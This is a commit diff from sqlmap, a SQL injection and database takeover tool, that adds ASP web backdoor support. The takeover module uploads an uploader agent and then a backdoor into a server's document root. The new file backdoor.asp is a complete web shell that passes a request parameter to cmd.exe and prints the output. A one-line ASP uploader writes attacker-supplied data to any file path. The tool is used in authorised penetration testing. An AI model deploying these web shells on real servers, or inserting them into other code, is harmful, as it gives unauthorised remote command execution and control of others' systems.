Initial support for ASP web backdoor functionality

This commit is contained in:
Bernardo Damele 2009-05-06 12:14:38 +00:00
parent f3e8d6db70
commit c5d20b8a86
4 changed files with 121 additions and 22 deletions

View File

@ -92,6 +92,9 @@ class Connect:
url = "%s?%s" % (url, params)
requestMsg += "?%s" % params
if post:
post = urlencode(post).replace("%%", "%")
elif multipart:
multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
conn = multipartOpener.open(url, multipart)

View File

@ -113,15 +113,14 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
def __webBackdoorInit(self):
"""
This method is used to write a PHP agent (cmd.php) on a writable
This method is used to write a web backdoor (agent) on a writable
remote directory within the web server document root.
Such agent is written using the INTO OUTFILE MySQL DBMS
functionality
"""
self.checkDbmsOs()
backdoorUrl = None
language = None
kb.docRoot = getDocRoot()
directories = getDirs()
directories = list(directories)
@ -130,11 +129,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
infoMsg = "trying to upload the uploader agent"
logger.info(infoMsg)
# TODO: backdoor and uploader extensions must be the same as of
# the web application language in use
backdoorName = "backdoor.php"
message = "which web application language does the web server "
message += "support?\n"
message += "[1] ASP\n"
message += "[2] PHP (default)\n"
message += "[3] JSP"
while True:
choice = readInput(message, default="2")
if not choice or choice == "2":
language = "php"
break
elif choice == "1":
language = "asp"
break
elif choice == "3":
# TODO: add also JSP backdoor/uploader support
errMsg = "JSP web backdoor functionality is not yet "
errMsg += "implemented"
raise sqlmapUnsupportedDBMSException, errMsg
#language = "jsp"
#break
elif not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > 3:
logger.warn("invalid value, it must be 1 or 3")
backdoorName = "backdoor.%s" % language
backdoorPath = "%s/%s" % (paths.SQLMAP_SHELL_PATH, backdoorName)
uploaderName = "uploader.php"
uploaderName = "uploader.%s" % language
uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
for directory in directories:
@ -165,25 +197,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
logger.info(infoMsg)
# Upload the backdoor through the uploader agent
multipartParams = {
"upload": "1",
"file": open(backdoorPath, "r"),
"uploadDir": directory,
}
page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
if language == "php":
multipartParams = {
"upload": "1",
"file": open(backdoorPath, "r"),
"uploadDir": directory,
}
page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
if "Backdoor uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
logger.warn(warnMsg)
if "Backdoor uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
logger.warn(warnMsg)
continue
continue
elif language == "asp":
backdoorRemotePath = "%s/%s" % (directory, backdoorName)
backdoorRemotePath = os.path.normpath(backdoorRemotePath)
backdoorContent = open(backdoorPath, "r").read()
postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
page, _ = Request.getPage(url=uploaderUrl, direct=True, post=postStr)
if "permission denied" in page.lower():
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
logger.warn(warnMsg)
continue
elif language == "jsp":
# TODO: add also JSP backdoor/uploader support
pass
backdoorUrl = "%s/%s" % (baseUrl, backdoorName)
infoMsg = "the backdoor has been successfully uploaded on "
infoMsg += "'%s', go with your browser to " % directory
infoMsg += "'%s' and enjoy it!" % backdoorUrl
infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s', go with your browser " % directory
infoMsg += "to '%s' and enjoy it!" % backdoorUrl
logger.info(infoMsg)
break

44
shell/backdoor.asp Normal file
View File

@ -0,0 +1,44 @@
<!--
ASP_KIT
cmd.asp = Command Execution
by: Maceo
modified: 25/06/2003
-->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = request("cmd")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

View File

@ -1 +1,2 @@
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
<p><b>sqlmap backdoor uploader</b></p>
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>